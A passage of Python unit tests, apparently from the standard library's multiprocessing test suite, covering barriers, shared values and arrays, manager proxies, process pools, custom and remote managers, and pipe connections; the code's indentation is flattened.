def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
